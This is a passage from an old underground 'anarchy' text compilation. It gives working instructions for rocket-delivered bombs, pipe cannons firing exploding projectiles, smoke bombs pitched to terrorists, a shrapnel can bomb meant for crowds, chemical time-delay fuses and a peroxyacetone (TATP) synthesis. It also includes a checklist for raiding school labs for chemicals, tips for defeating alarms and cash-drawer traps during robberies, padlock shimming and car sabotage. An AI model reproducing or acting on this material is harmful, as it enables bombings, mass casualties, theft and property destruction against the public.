seen when it reaches its maximum altitude, or apogee.

     When it is burned up, it ignites the ejection charge, labeled "eject".
The ejection charge is finely powdered black powder.  It burns very rapidly,
exploding, in effect.  The explosion of the ejection charge pushes out the
parachute of the model rocket. It could also be used to ignite the fuse of a
bomb...

     Rocket engines have their own peculiar labeling system.  Typical engine
labels are: 1/4A-2T, 1/2A-3T, A8-3, B6-4, C6-7, and D12-5.  The letter is an
indicator of the power of an engine.  "B" engines are twice as powerful as "A"
engines, and "C" engines are twice as powerful as "B" engines, and so on.  The
number following the letter is the approximate thrust of the engine, in
pounds. the final number and letter is the time delay, from the time that the
thrust period of engine burn ends until the ejection charge fires; "3T"
indicates a 3 second delay.

NOTE: an extremely effective rocket propellant can be made by mixing aluminum
      dust with ammonium perchlorate and a very small amount of iron oxide.
      The mixture is bound together by an epoxy.


BASIC ROCKET BOMB

     A rocket bomb is simply what the name implies: a bomb that is delivered
to its target by means of a rocket.  Most people who would make such a device
would use a model rocket engine to power the device.  By cutting fins from
balsa wood and gluing them to a large rocket engine, such as the Estes "C"
engine, a basic rocket could be constructed.  Then, by attaching a "crater
maker", or CO2 cartridge bomb to the rocket, a bomb would be added.  To insure
that the fuse of the "crater maker" (see sect. 4.42) ignited, the clay over
the ejection charge of the engine should be scraped off with a plastic tool.
The fuse of the bomb should be touching the ejection charge, as shown below.



          ____________ rocket engine
          |                         _________ crater maker
          |                         |
          |                         |
          V                         |
     _______________________________V_
     |_______________________________|  ______________________
      \   | - - - - - -|***|::::|      /# # # # # # # # # # # \
       \__| - - - - - -|***|::::|  ___/  # # # # # # # # # # # \
        __  - - - - - -|***|::::|---fuse--- # #  explosive  # # )
       /  | - - - - - -|***|::::|  ___   # # # # # # # # # # # /
      /___|____________|___|____|____ \_______________________/
      |_______________________________|

     thrust> - - - - - -
     smoke>  ***
     ejection charge> ::::


     Duct tape is the best way to attach the crater maker to the rocket
engine. Note in the diagram the absence of the clay over the ejection charge
Many different types of explosive payloads can be attached to the rocket, such
as a high explosive, an incendiary device, or a chemical fire bottle.

   Either four or three fins must be glued to the rocket engine to insure that
the rocket flies straight. The fins should look like the following diagram:



          |\
          | \
          |  \
          |   \  <--------- glue this to rocket engine
          |    \
          |     \
          |      \
          |       |
          |       |
          |       |
  leading edge    |
   ------->       |
          |       |
          |       |  trailing edge
          |       |    <--------
          |       |
          |       |
          |       |
          |       |
           \_____/


     The leading edge and trailing edge should be sanded with sandpaper so
that they are rounded.  This will help make the rocket fly straight.  A two
inch long section of a plastic straw can be attached to the rocket to launch
it from.  A clothes hanger can be cut and made into a launch rod.  The segment
of a plastic straw should be glued to the rocket engine adjacent to one of the
fins of the rocket.  A front view of a completed rocket bomb is shown below.


                              |
           fin                | <------ fin
            |                 |           |
            |                 |           |
            |               __|__         |
            V              /     \        V
           ---------------|       |---------------
                           \_____/
                              |o <----------- segment of plastic straw           
                   |
                              |
                              | <------ fin
                              |
                              |

     By cutting a coat hanger at the indicated arrows, and bending it, a
launch rod can be made.  After a fuse is inserted in the engine, the rocket is
simply slid down the launch rod, which is put through the segment of plastic
straw. The rocket should slide easily along a coathanger, such as the one
illustated on the following page:


                        ____
                       /    \
                      |      |
          cut here _____     |
                       |     |
                       |     |
                       |    / \
                       V   /   \
         _________________/     \________________
        /                                        \
       /                                          \
      /____________________________________________\
                                   ^
                                   |
                                   |
                    and here ______|


     Bend wire to this shape:


                         _______ insert into straw
                         |
                         |
                         |
                         V
          ____________________________________________
          \
           \
            \
             \
              \  <--------- bend here to adjust flight angle
               |
               |
               |
               |
               |
               | <---------- put this end in ground
               |


LONG RANGE ROCKET BOMB

     Long range rockets can be made by using multi-stage rockets.  Model
rocket engines with an "0" for a time delay are designed for use in
multi-stage rockets.  An engine such as the D12-0 is an excellent example of
such an engine. Immediately after the thrust period is over, the ejection
charge explodes.  If another engine is placed directly against the back of an
"0" engine, the explosion of the ejection charge will send hot gasses and
burning particles into the nozzle of the engine above it, and ignite the
thrust section.  This will push the used "0" engine off of the rocket, causing
an overall loss of weight.

 The main advantage of a multi-stage rocket is that it loses weight as
travels, and it gains velocity.  A multi-stage rocket must be designed
somewhat differently than a single stage rocket, since, in order for a rocket
to fly straight, its center of gravity must be ahead of its center of drag.
This is accomplished by adding weight to the front of the rocket, or by moving
the center of drag back by putting fins on the rocket that are well behind the
rocket.  A diagram of a multi-stage rocket appears on the following page:

                    ___
                   /   \
                   |   |
                   | C |
                   | M | ------ CM: Crater Maker
                   |   |
                   |   |
                   |___|
                   |   |
                   |   |
                   |   |
                   | C | ------ C6-5 rocket engine
                  /| 6 |\
                 / | | | \
                /  | 5 |  \
               /   |___|   \ ---- fin
              /   /|   |\   \
             /   / |   | \   \
            /   /  |   |  \   \
           /   /   | C |   \   \
          |   /    | 6 |    \   |
          |  /     | | |     \  |
          | /      | 0 |      \ |
          |/       |___|       \|
          |       /     \       |
          \______/   ^   \______/ ------- fin
                     |
                     |
                     |
                     |
                     C6-0 rocket engine

     The fuse is put in the bottom engine.

     Two, three, or even four stages can be added to a rocket bomb to give it
a longer range.  It is important, however, that for each additional stage, the
fin area gets larger.


                                        -= Exodus =-
                                             '94





BASIC PIPE CANNON                                -= Exodus =-


     A simple cannon can be made from a thick pipe by almost anyone.  The only
difficult part is finding a pipe that is extremely smooth on its interior.
This is absolutely necessary; otherwise, the projectile may jam.  Copper or
aluminum piping is usually smooth enough, but it must also be extremely thick
to withstand the pressure developed by the expanding hot gasses in a cannon.

  If one uses a projectile such as a CO2 cartridge, since such a projectile
can be made to explode, a pipe that is about 1.5 - 2 feet long is ideal.  Such
a pipe MUST have walls that are at least 1/3 to 1/2 an inch thick, and be very
smooth on the interior.  If possible, screw an endplug into the pipe.
Otherwise, the pipe must be crimped and folded closed, without cracking or
tearing the pipe. A small hole is drilled in the back of the pipe near the
crimp or endplug. Then, all that need be done is fill the pipe with about two
teaspoons of grade blackpowder or pyrodex, insert a fuse, pack it lightly by
ramming a wad of tissue paper down the barrel, and drop in a CO2 cartridge.
Brace the cannon securely against a strong structure, light the fuse, and run.
If the person is lucky, he will not have overcharged the cannon, and he will
not be hit by pieces of exploding barrel.  Such a cannon would look like this:


             __________________ fuse hole
             |
             |
             V
      ________________________________________________________________
      | |_____________________________________________________________|
      |endplug|powder|t.p.| CO2 cartridge
      | ______|______|____|____________________________________________
      |_|______________________________________________________________|

     An exploding projectile can be made for this type of cannon with a CO2
cartridge. It is relatively simple to do. Just make a crater maker, and
construct it such that the fuse projects about an inch from the end of the
cartridge. Then, wrap the fuse with duct tape, covering it entirely, except
for a small amount at the end. Put this in the pipe cannon without using a
tissue paper packing wad.


                                         ___
 When the cannon is fired, it           (   )
will ignite the end of the              |C  |
fuse, and shoot the CO2                 |  M|
cartridge. The                          |   |
explosive-filled cartridge              |   |
will explode in about three             \  /
seconds, if all goes well.               [] <--- taped fuse
Such a projectile would look             []
like this:                               []
                                         !  <--- Bare fuse (add matchheads)
ROCKET FIRING CANNON


           ___          A rocket firing cannon can be made exactly like a
          /   \    normal cannon; the only difference is the ammunition. A
          |   |    rocket fired from a cannon will fly further than a rocket
          | C |    alone, since the action of shooting it overcomes the
          | M |    initial inertia. A rocket that is launched when it is
          |   |    moving will go further than one that is launched when it
          |   |    is stationary. Such a rocket would resemble a normal
          |___|    rocket bomb, except it would have no fins. It would look
          | E |    like the image to the left.
          | N |
          | G |         the fuse on such a device would, obviously, be short,
          | I |    but it would not be ignited until the rocket's ejection
          | N |    charge exploded.  Thus, the delay before the ejection
          | E |    charge, in effect, becomes the delay before the bomb
          |___|    explodes. Note that no fuse need be put in the rocket; the
                   burning powder in the cannon will ignite it, and
                   simultaneously push the rocket out of the cannon at a high
                   velocity.


REINFORCED PIPE CANNON     

In high school, a friend and I built cannons and launched CO2 cartridges, etc,
etc.  However, the design of the cannon is what I want to add here.

It was made from plain steel water pipe, steel wire, and lead.

Here is a cross section:


      _______
      |     |
      | xxxxx_____________________________________________    2" ID pipe
      | |_________________________________________________
      | | ....................  <- steel wire           }
      | |    _____                                      }     3/4" ID pipe
this  | |    | xxx______________________________________}_________________
wire  | |    | |__________________________________________________________
holds | |....| |
it up |>|....| |
in the| |    | |__________________________________________________________
cooker| |    | xxx________________________________________________________
      | |    |____                                      }
      | | .....................                         } <- cast lead
      | |_______________________________________________}_
      | |    _____________________________________________
      | xxxxx
      |_____|


    We dug into the side of a sand pile and built a chimney out of firebrick.
Then we stood the assembled pipe and wire on end in the chimney, sitting on
some bricks.  We then had a blowtorch heating up the chimney, so that the pipe
was red hot.  Then we poured molten lead into the space between the pipes.  If
the caps aren't screwed on real tight, some of the lead will leak out.  If
that happens, turn off the blowtorch and the pipe will cool enough and the
lead will stiffen and stop the leak.

    We used homemeade and commercial black powder, and slow smokeless shotgun
powder in this thing.  After hundreds of shots we cut it up and there was no
evidence of cracks or swelling of the inner pipe.

                                                         


SMOKE BOMBS 4.14                                    -= Exodus =-


     One type of pyrotechnic device that might be employed by a terrorist in
many way would be a smoke bomb.  Such a device could conceal the getaway
route, or cause a diversion, or simply provide cover.  Such a device, were it
to produce enough smoke that smelled bad enough, could force the evacuation of
a building, for example.  Smoke bombs are not difficult to make.  Although the
military smoke bombs employ powdered white phosphorus or titanium compounds,
such materials are usually unavailable to even the most well-equipped
terrorist. Instead, he/she would have to make the smoke bomb for themselves.

     Most homemade smoke bombs usually employ some type of base powder, such
as black powder or pyrodex, to support combustion.  The base material will
burn well, and provide heat to cause the other materials in the device to
burn, but not completely or cleanly.  Table sugar, mixed with sulfur and a
base material, produces large amounts of smoke.  Sawdust, especially if it has
a small amount of oil in it, and a base powder works well also.  Other
excellent smoke ingredients are small pieces of rubber, finely ground
plastics, and many chemical mixtures.  The material in road flares can be
mixed with sugar and sulfur and a base powder produces much smoke.  Most of
the fuel-oxodizer mixtures, if the ratio is not correct, produce much smoke
when added to a base powder.  The list of possibilities goes on and on.  The
trick to a successful smoke bomb also lies in the container used.  A plastic
cylinder works well, and contributes to the smoke produced.  The hole in the
smoke bomb where the fuse enters must be large enough to allow the material to
burn without causing an explosion.  This is another plus for plastic
containers, since they will melt and burn when the smoke material ignites,
producing an opening large enough to prevent an explosion.

--SIMPLE SMOKE                           

  The following reaction should produce a fair amount of smoke.  Since this
 reaction is not all that dangerous you can use larger amounts if necessary

 6 pt. ZINC POWDER
 1 pt. SULFUR POWDER
                       Insert a red hot wire into the pile, step back.


---COLORED FLAMES

     Colored flames can often be used as a signaling device for terrorists. by
putting a ball of colored flame material in a rocket; the rocket, when the
ejection charge fires, will send out a burning colored ball.  The materials that
produce the different colors of flames appear below.

COLOR               MATERIAL                        USED IN

red                 strontium                      road flares,                  
                    salts                          red sparklers
                   (strontium
                     nitrate)

green               barium salts                   green sparklers               
                   (barium nitrate)

yellow              sodium salts                   gold sparklers                
                  (sodium nitrate)

blue                powdered copper                blue sparklers,               
                    old pennies

white               powdered magnesium             firestarters,                 
                    or aluminum                    aluminum foil

purple              potassium permanganate         purple fountains,             
                                                   treating sewage

      -------**>> LISTS OF SUPPLIERS AND MORE INFORMATION <<**--------

     Most, if not all, of the information in this publication can be obtained
through a public or university library.  There are also many publications that
are put out by people who want to make money by telling other people how to
make explosives at home.  Adds for such appear frequently in paramilitary
magazines and newspapers.  This list is presented to show the large number of
places that information and materials can be purchased from.   It also
includes fireworks companies and the like.


COMPANY NAME AND ADDRESS               WHAT COMPANY SELLS
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ               ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
 FULL AUTO CO. INC.                     EXPLOSIVE RECIPES,
 P.O. BOX 1881                          PAPER TUBING
 MURFREESBORO, TN
 37133

 UNLIMITED                              CHEMICALS AND FUSE
 BOX 1378-SN
 HERMISTON, OREGON
 97838

 AMERICAN FIREWORKS NEWS                FIREWORKS NEWS MAGAZINE WITH
 SR BOX 30                              SOURCES AND TECHNIQUES
 DINGMAN'S FERRY, PENNSYLVANIA 18328

 BARNETT INTERNATIONAL INC.             BOWS, CROSSBOWS, ARCHERY MATERIALS,
 125 RUNNELS STREET                     AIR RIFLES
 P.O. BOX 226
 PORT HURON, MICHIGAN 48060

 CROSSMAN AIR GUNS                      AIR GUNS
 P.O. BOX 22927
 ROCHESTER, NEW YORK
 14692

 R. ALLEN                               PROFESSIONAL FIREWORKS CONSTRUCTION
 P.O. BOX 146                           BOOKS & FORMULAS
 WILLOW GROVE, PA 19090

 MJ DISTRIBUTING                        FIREWORKS FORMULAS
 P.O. BOX 10585
 YAKIMA,WA   98909

 EXECUTIVE PROTECTION PRODUCTS INC.     TEAR GAS GRENADES,
 316 CALIFORNIA AVE.                    PROTECTION DEVICES
 RENO, NEVADA
 89509


 COMPANY NAME AND ADDRESS               WHAT COMPANY SELLS
 ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ               ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
 BADGER FIREWORKS CO. INC.              CLASS "B" AND "C" FIREWORKS  BOX 1451
 JANESVILLE, WISCONSIN
 53547

 NEW ENGLAND FIREWORKS CO. INC.         CLASS "C" FIREWORKS  P.O. BOX 3504
 STAMFORD, CONNECTICUTT
 06095

 RAINBOW TRAIL                          CLASS "C" FIREWORKS  BOX 581
 EDGEMONT, PENNSYLVANIA 19028

 STONINGTON FIREWORKS INC.              CLASS "C" AND "B" FIREWORKS  4010 NEW
 WILSEY BAY U.25 ROAD
 RAPID RIVER, MICHIGAN 49878

 WINDY CITY FIREWORKS INC.              CLASS "C" AND "B" FIREWORKS
 P.O. BOX 11                            (GOOD PRICES!)
 ROCHESTER, INDIANA 46975

BOOKS
ÄÄÄÄÄ
THE ANARCHIST COOKBOOK II-IV          (highly circulated)

THE IMPROVISED MUNITIONS MANUAL    (formulas work, but put maker at risk)

MILITARY EXPLOSIVES


   Two manuals of interest:  Duponts "Blaster's Handbook", a $20 manual mainly
useful for rock and seismographic operations.  Atlas's "Powder Manual" or
"Manual of Rock Blasting" (I forget the title, it's in the office).  This is a
$60 book, well worth the cash, dealing with the above two topics, plus
demolitions, and non-quarry blasting.

                                                 
                                                
                                                 -= Exodus =-
CHECKLIST FOR RAIDS ON LABS                              by: Exodus

     In the end, the serious terrorist would probably realize that if he/she
wishes to make a truly useful explosive, he or she will have to steal the
chemicals to make the explosive from a lab.  A list of such chemicals in order
of priority would probably resemble the following:

     LIQUIDS                    SOLIDS
     _______                    ______

     ____     Nitric Acid        ____    Potassium Perchlorate
     ____     Sulfuric Acid      ____    Potassium Chlorate
     ____     95% Ethanol        ____    Picric Acid (usually a powder)
     ____     Toluene            ____    Ammonium Nitrate
     ____     Perchloric Acid    ____    Powdered Magnesium
     ____     Hydrochloric Acid  ____    Powdered Aluminum
                                 ____    Potassium Permanganate
     GASES                       ____    Sulfur (flowers of)
     _______                     ____    Mercury
                                 ____    Potassium Nitrate
     ____     Hydrogen           ____    Potassium Hydroxide
     ____     Oxygen             ____    Phosphorus
     ____     Chlorine           ____    Sodium Azide
     ____     Carbon Dioxide     ____    Lead Acetate
                                 ____    Barium Nitrate
Print this sheet out and carry it with you!  Memorize it, anything.  It is
INVALUABLE.  All of these chemicals should be carried in your school lab.
Happy hunting. :)


                                            - Exodus -

                           MISC ANARCHY!



PART 2 - Tennis ball cannons 
------   Information from the Usenet.  The Usenet is a worldwide network of      
         15,000 machines and over 500,000 people- And growing!

         Addendum by The Editor:   If you aren't in the Chicago area,
         check a local BBS list.  If you see a BBS which runs under UNIX,
         odds are it carries usenet.  The appropriate place to look is 
         rec.pyrotechnics.

At this time (twelve years ago) most soft drink cans were rolled tin rather
than the molded aluminum.  We would cut the tops and bottoms off of a  bunch
of them and tape them together with duct tape, forming a tube  of two feet or
more.

        At the end we would tape a can with the bottom  intact, more holes
punched (with a can opener) around the top, and a  small hole in the side at
the base. We then fastened this contraption to a tripod so we could aim it
reliably. Any object that came somewhat close to filling the tube was then
placed therein.

        In the shop, we used the clock as a target and an empty plastic
solder spool as ammunition, with tape over the ends of the center hole and
sometimes filled with washers for weight.  When taken to parties or picnics,
we would use whatever was handy.  Hot dog rolls or napkins filled with  potato
chips provided spectacular entertainment.
 
        Once loaded, a small amount of lighter fluid was poured into the hole
in  the side of the end can and allowed to vaporize for a few moments.  The
"fire control technician" would announce "Fire in the Hole" and ignite  it.
 
BOOM!  Whoosh!  The clock never worked after that! 
---------- 

    Our version of the potato chip cannon, originally designed around the
Pringles potato chip can, was built similarly.  Ours used coke cans, six with
the top and bottom removed, and the  seventh had Bottle opener holes all
around one end, the top of this can was covered with a grid or piece of wire
screening to keep the tennis ball from falling all the way to the bottom.
This was spiral  wrapped with at least two rolls of duct tape.

     A wooden shoulder rest  and forward hand grip was taped to the tube.  For
ignition we used  lantern batteries to a model-t coil, actuated by a push
button on  the hand grip.  A fresh wilson tennis ball was stuffed all the way
back to the grid, and a drop or two of lighter fluid was dropped in  one of
two holes in the end.  The ignition wire was poked through  the other hole.
 
    We would then lie in ambush, waiting for somthing to move.  When fired
with the proper air/fuel mixture, a satisfying thoomp!  At maximum range  the
ball would travel about 100 yards with a 45 degree launch angle.  Closer up
the ball would leave a welt on an warring opponent.  When  launched at a
moving car the thud as it hit the door would generally  rattle anyone inside.
Luckily we never completed the one that shot golf balls.

PART 4
                    More Fun Stuff for Terrorists

                             Carbide Bomb

This is EXTREMELY DANGEROUS. Exercise extreme caution.... Obtain some calcium
carbide. This is the stuff that is used in carbide lamps and can be found at
nearly any hardware store.
    Take a few pieces of this stuff (it looks like gravel) and put it in a
glass jar with some water. Put a lid on tightly. The carbide will react with
the water to produce acetylene carbonate which is similar to the gas used in
cutting torches.
    Eventually the glass with explode from internal pressure. If you leave a
burning rag nearby, you will get a nice fireball!
                      Auto Exhaust Flame Thrower

For this one, all you need is a car, a sparkplug, ignition wire and a switch.
Install the spark plug into the last four or five inches of the tailpipeby
drilling a hole that the plug can screw into easily. Attach the wire (this is
regular insulated wire) to one side of the switch and to the spark plug. The
other side of the switch is attached to the positive terminal on the battery.
With the car running, simply hit the switch and watch the flames fly!!! Again be
careful that no one is behind you! I have seen some of these flames go 20
feet!!!

PART 5- This is all various files I gleaned from BBS's.  (Added 8-23-90)
  
        Balloons are fun to play with in chem lab, fill them with the gas
that you get out of the taps on the lab desks, then tie up the  balloon
tight, and drop it out the window to the burnouts below, you  know, the ones
that are always smoking, they love to pop balloons with lit cigarette.... get
the picture? Good...

                                         -= Exodus =-
 
                             OPENING COMBO LOCKS

[ Touched up by V.T - The Editor ]

    First of all, let me tell you about the set-up of a lock.  When the lock
is locked, there is a curved piece of metal wedged inside the little notch on
the horseshoe shaped bar (known as the shackle) that is pushed in to the lock
when you lock it.

     To free this wedge, you usually have to turn the lock to the desired
combination and the pressure on the wedge is released therefore letting the
lock open.  I will now tell you how to make a pick so you can open a lock
without having to waste all that time turning the combination (this also helps
when you don't know the combination to begin with).

        To bypass this hassle, simply take a thinned hairpin (file it down) or
a opened out piece of a collapsing antenna (the inside diameter of the curved
piece of metal should be the same as the diameter of the shackle- if the metal
is too thick, use fine sandpaper to thin it down.

    Once you have your hair pin (make sure it's metal), take the ridged side
and break it off right before it starts to make a U-turn onto the straight
side.  The curved part  can now be used as a handle. Now, using a file, file
down the other end until it is fairly thin.  You should do this to many
hairpins and file them so they are of different thicknesses so you can jimmy
various locks.

  Look at a lock to see which side the lock opens from.  If you can't tell,
you will just have to try both sides.  When ya find out what side it opens
from, , take the lock pick and stick the filed end into the inside of the
horseshoe-shaped bar on whichever side the lock opens from.

     Now, put pressure on the handle of the lock pick (pushing down, into the
crack) and pull the lock up and down.  The lock will then open because the
pick separated the wedge and the notch allowing it to open.

  Also, this technique works best on American locks.  I have never picked a
Master lock before because of the shape a pressure of the wedge but if anyone
does it, let me know how long it took. Also, the Master lock casing is very
tight so ya can't get the shim in.

                                                  -------Exodus
   PYROTECHNICAL DELIGHTS
                               WRITTEN BY RAGNER ROCKER

  Many of you out there probably have fantasies of revenge against teachers,
principals and other people who are justassholes.  depending on your level of
hatred of this person i would advise that you do some of these following
experiments:

  (1) Pouring dishsoap into the gas tank of your enemy- many of you already
know that gasoline + dishsoap(e.g.  joy, palmolive, etc.) form a mixture
called napalm.  now napalm is a jelly-like  substance used in bombs,
flamethrowers, etc.  now you can only guess what this mixture would do to
someone's fuel line!!!!

  (2) Spreading dirty motor oil/castor oil on someone's exhaust pipe- when
the exhaust pipe heats up(and it will!!)the motor oil or castor oil on the pipe
will cause thick, disgusting smoke to ooze forth from the back of that car.
Who knows maybe he/she might be pulled over and given a ticket!!

  (3) Light Bulb Bomb- see part one of the file

 (4) Simple smoke/stink bomb- you can purchaase sulphur at a drugstore under
the name flowers of sulphur.  now when sulphur burns it will give off a very
strong odor and plenty of smoke.  now all you need is a fuse from a
firecracker, a tin can, and the sulphur.  fill the can with sulphur(pack very
lightly), put aluninum foil over the top of the can, poke a small hole into
the foil, insert the wick, and light it and get out of the room if you value
your lungs.  you can find many uses for this( or at least i hope so.
 
                               FUN WITH ALARMS
 
    A fact I forgot to mention in my previous alarm articles is that one can
also use polyurethane foam in a can to silence horns and bells.  You can
purchase this at any hardware store as insulation.  it is easy to handle and
dries faster.

Many people that travel carry a pocket alarm with them.  this alarm is a small
device that is hung around the door knob, and when someone touches the knob his
body capacitance sets off the alarm.  these nasty nuisences can be found by
walking down the halls of a hotel and touching all the door knobs very quickly.
if you happen to chance upon one, attach a 3' length of wire or other metal
object to the knob.  this will cause the sleeping business pig inside to think
someone is breaking in and call room service for help.  all sorts of fun and
games will ensue.

    Some high-security instalations use keypads just like touch-tone pads (a
registered trade mark of bell systems) to open locks or disarm alarms.  most
use three or four digits.  to figure out the code, wipe the key-pad free from
all fingerprints by using a rag soaked in rubbing alcohol.  after the keypad
has been used just apply finger print dust and all four digits will be marked.
now all you have to do is figure out the order. if you want to have some fun
with a keypad, try pressing the * and # at the same time.  many units use this
as a panic button. This will bring the owner and the cops running and ever-one
will have a good time.  never try to remove these panels from the wall, as
they have built-in tamper switches.
 
    On the subject of holdups, most places (including supermarkets, liqour
stores, etc.) have what is known as a money clip.  these little nasties are
placed at the bottom of a money drawer and when the last few bills are
with-drawn a switch closes and sets the alarm off.  that's why when you make
your withdrawl it's best to help yourself so you can check for these little
nasties.  if you find them, merely insert ones underneath the pile of
twenties, and then pull out the twenties, leaving the one-dollar bill behind
to prevent the circuit from closing.

   SOFT DRINK CAN BOMB  AN ARTICLE FROM THE BOOK:

  THE POOR MAN'S JAMES BOND    BY KURT SAXON
 
 This is an anti-personnel bomb meant for milling crowds.  the bottom of a
soft drink can is half cut out and bent back.  a giant firecracker or other
explosive is put in and surrounded with nuts and bolts or rocks.  the fuse is
then armed with a chemical delay in a plastic drinking straw.

      ! !                            After first making sure there are no
      ! !                           children nearby, the acid or glycerine
      ! ! <-CHEMICAL INGITER        is put into the straw and the can is set
   ---- ----                        down by a tree or wall where it will not
   !  !1!  !                        be knocked over.  the delay should give
   ! ===== !                        you three to five minutes.  it will then
   !* ! ! "!                        have a shattering effect on passersby.
   !  ! !  !
   !  ! !  !<- BIG FIRECRACKER
   !  ! !% !
   !  ==== !
   !       !
   !   #   !                          It is hardly likely that anyone would
   !  ---  !                         pick up and drink from someone else's
   !   !   !     <- NUTS & BOLTS     soft drink can.  but if such a crude
   !   /   !                         person should try to drink from your
   !       !                         bomb he would break a nasty habit
   ---------                         fast!


                  Pyro Book ][   by Capt Hack  and Grey Wolf
 
TIME DELAYED CHEMICAL FUSE
 
1) Put 1 teaspoon full of of potassium permanganate in a tin can.
2) add a few drops of glycerine
3) wait 3-4 min.
4) get the hell out..  the stuff will smoke, then burst into flame..

** potasium permanganate stains like iodine but worse [it's purple]
** the reaction will spatter a bit ->it can be messy...
** it doesn't matter if the amounts are uneven [ie.  1 part to 3 parts]

 
EXPLOSIVES AND INCENDIARIES by THE RESEARCHER

INTRODUCTION: The trouble with text books on chemistry and explosives is the
attitude with which they are written.  They don't say, "Now I know you would
like to blow holy hell out of something just for the fun of it so here is how
to whip up something in your kitchen to do it".  They tell you how Dupont does
it or how the anchient Chinese did it but not how you can do it with the
resourses and materials available to you.

 Even army manuals on field expedient explosives are almost useless because
they are just outlines written with the understanding that an instructor is
going to fill in the blanks.  It is a fun game to search out the materials
that can be put together to make something go "boom".  You can find what you
need in grocery stores, hardware stores, and farm supplies.  An interesting
point to remember is that it is much easier to make a big e explosion than a
small one.  It is very difficult for a home experimenter to make a
firecracker, but a bomb capable of blowing the walls out of a building is
easy.

                           HOW TO MAKE ROCKET FUEL

   This is easy to make and fun to play with.  Mix equal parts by volume
Potassium or Sodium Nitrate and granulated sugar.  Pour a big spoonful of
this into a pile. Stick a piece of blackmatch fuse into it; light; and step
back.  This is also a very hot incendiary.  A little imagination will suggest
a lot of experiments for this.

                             ANOTHER ROCKET FUEL

 Mix equal parts by volume of zinc dust and sulfur.  Watch out if you
experiment with this.  It goes off in a sudden flash.  It is not a powerful
explosive, but is violent stuff even when not confined because of its fast
burning rate.

  --- As I continue from this point some of the ingredients are going to be
harder to get without going through a chemical supply.  I try to avoid this.
I happen to know that B. Prieser Scientific (local to my area) has been
instructed by the police to send them the names of anyone buying chemicals in
certain combinations.  For example, if a person were to buy Sulfuric acid,
Nitric acid and Toluene (the makings for TNT) in one order the police would be
notified.  I will do the best I can to tell you how to make the things you
need from commonly available materials, but I don't want to leave out
something really good because you might have to scrounge for an ingredient.  I
am guessing you would prefer it that way.


                 HOW TO MAKE AN EXPLOSIVE FROM COMMON MATCHES

  Pinch the head near the bottom with a pair of wire cutters to break it up;
then use the edges of the cutters to scrape off the loose material.  It gets
easy with practice.  You can do this while watching TV and collect enough for
a bomb without dying of boredom.
    Once you have a good batch of it, you can load it into a pipe instead of
black powder.  Be careful not to get any in the threads, and wipe off any that
gets on the end of the pipe.  Never try to use this stuff for rocket fuel.  A
science teacher was killed that way.
      Just for fun while I'm on the subject of matches, did you know that you
can strike a safety match on a window pane? Hold a paper match between your
thumb and first finger.  With your second finger, press the head firmly
against a large window.  Very quickly, rub the match down the pane about 2
feet while maintaining the pressure.  The friction will generate enough heat
to light the match.

  Another fun trick is the match rocket.  Tightly wrap the top half of a paper
match with foil.  Set it in the top of a pop bottle at a 45 degree angle.
Hold a lighted match under the head until it ignites.  If you got it right,
the match will zip up and hit the ceiling.

 I just remembered the match guns I used to make when I was a kid.  These are
made from a bicycle spoke.  At one end of the spoke is a piece that screws
off.  Take it off and screw it on backwards.  You now have a piece of stiff
wire with a small hollow tube on one end.  Pack the material from a couple of
wooden safety matches into the tube.  Force the stem of a match into the hole.
It sould fit very tightly.  Hold a lighted match under the tube until it gets
hot enough to ignite the powder.  It goes off with a bang.


           HOW TO MAKE CONCENTRATED SULFURIC ACID FROM BATTERY ACID

 Go to an auto supply store and ask for "a small battery acid".  This should
only cost a few dollars.  What you will get is about a gallon of dilute
sulfuric acid.  Put a pint of this into a heat resistant glass container.  The
glass pitchers used for making coffee are perfect. Do not use a metal container.

  Use an extension cord to set up a hotplate out doors.  Boil the acid until
white fumes appear.  As soon as you see the white fumes, turn off the hot
plate and let the acid cool.  Pour the now concentrated acid into a glass
container.  The container must have a glass stopper or plastic cap -- no
metal.  It must be air tight.  Otherwize, the acid will quickly absorb
moisture from the air and become diluted.  Want to know how to make a time
bomb that doesn't tick and has no wires or batteries? Hold on to your acid and
follow me into the next installment.

                   HOW TO MAKE A CHEMICAL TIME DELAY FUSE:

    To get an understanding of how this is going to work, mix up equal parts
by volume Potassium chlorate and granulated sugar.  Pour a spoonful of the
mixture in a small pile and make a depression in the top with the end of a
spoon.  Using a medicine dropper, place one drop of concentrated sulfuric acid
in the depression and step back.
     It will snap and crackle a few times and then burst into vigorous flames.
To make the fuse, cut about 2 inches off a plastic drinking straw.  Tamp a
small piece of cotton in one end.  On top of this put about an inch of the
clorate/sugar mixture.
    Now lightly tamp in about a quarter inch of either glass wool or asbestos
fibers.  Secure this with the open end up and drop in 3 or 4 drops of sulfuric
acid.  After a few minutes the acid will soak through the fibers and ignite
the mixture.
    The time delay can be controled by the amount of fiber used and by varying
how tightly it is packed.  Don't use cotton for this.  The acid will react
with cotton and become weakened in the process.  By punching a hole in the
side of the straw, a piece of blackmatch or other fuse can be inserted and
used to set off the device of your choice.

     Potassium chlorate was very popular with the radical underground.  It can
be used to make a wide variety of explosives and incendiaries, some of them
extremely dangerous to handle.  The radicals lost several people that way.
But, don't worry.  I am not going to try to protect you from yourself.  I have
decided to tell all.  I will have more to say about Potassium chlorate, but
for now, let's look at a couple of interesting electric fuses.


                                PEROXYACETONE

 PEROXYACETONE IS EXTREMELY FLAMMABLE AND HAS BEEN REPORTED TO BE SHOCK
 SENSITIVE.

MATERIALS-
 4ML ACETONE
 4ML 30% HYDROGEN PEROXIDE
 4 DROPS CONC.  HYDROCHLORIC ACID
 150MM TEST TUBE

Add 4ml acetone and 4ml hydrogen peroxide to the test tube.  then add 4 drops
concentrated hydrochloric acid. In 10-20 minutes a white solid should begin to
appear. if no change is observed, warm the test tube in a water bath at 40
celsius. Allow the reaction to continue for two hours.  Swirl the slurry and
filter it. Leave out on filter paper to dry for at least two hours.  To
ignite, light a candle tied to a meter stick and light it (while staying at
least a meter away) .

I would like to give credit to a book by shakashari entitled "Chemical
demonstrations" for a few of the precise amounts of chemicals in some
experiments.
                    ...ZAPHOD BEEBLEBROX/MPG!


THE CHEMIST'S CORNER #2:    HOUSEHOLD CHEMICALS, BY ZAPHOD BEEBLEBROX/MPG

 This article deals with instructions on how to do some interesting
experiments with common household chemicals.  Some may or may not work
depending on the concentration of certain chemicals in different areas and
brands.  I would suggest that the person doing these experiments have some
